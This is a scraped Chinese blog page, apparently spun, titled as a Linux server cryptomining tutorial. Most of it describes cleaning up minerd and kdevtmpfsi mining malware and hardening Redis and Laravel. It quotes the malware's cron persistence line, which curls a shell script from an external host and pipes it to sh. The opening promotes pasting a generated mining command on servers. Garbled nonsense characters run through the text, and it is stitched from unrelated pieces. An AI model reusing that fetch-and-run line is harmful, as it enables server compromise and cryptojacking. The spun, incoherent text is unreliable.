如何用Linux服务器挖矿教程

如何用Linux服务器挖矿教程,第1张

Linux服务器挖矿,只需要两步

打散缓开 网站,输入手机号,选择你要乎掘神使用多少CPU来挖矿,默认为使用50%的CPU进行挖矿,点击生成你的专属岁亏命令并复制

进入控制台粘贴命令,并点击运行

就是这么 *** 作简单。

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒文件内容如下,感兴趣的可以研究下:

View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会茄伍返以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给颤饥攻击者使用config指令加大难度橘物

好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

服务器CPU飙亮纯巧升到100%,发现可以进程 kdevtmpfsi

网上查资料,是因为 redis 漏洞引起的,但服务器上并没有装 redis,后来再国外的网站查到可能是因为 laravel 的版本引起的

https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu

这个进程以及相关进程,都是运行裤衫在 www 用户下,并且会加上一个定时任务

解决办法:

1、删除定时任务

看是否有 www 的定时任务,如果有的话,删除并且放一个占位文件,让病毒无权限修改

2、删除病毒文件敬键

并且放一个假文件在 tmp 目录(用处不大,病毒会自己改名,加后缀)

3、杀进程

4、升级 laravel

把 ignition 升级到 2.5.1 以上

5、阻止 IP 访问。病毒会去下面这两个IP读脚本下来


欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/yw/12345640.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-05-22
下一篇2023-05-22

发表评论

登录后才能评论

评论列表(0条)

    保存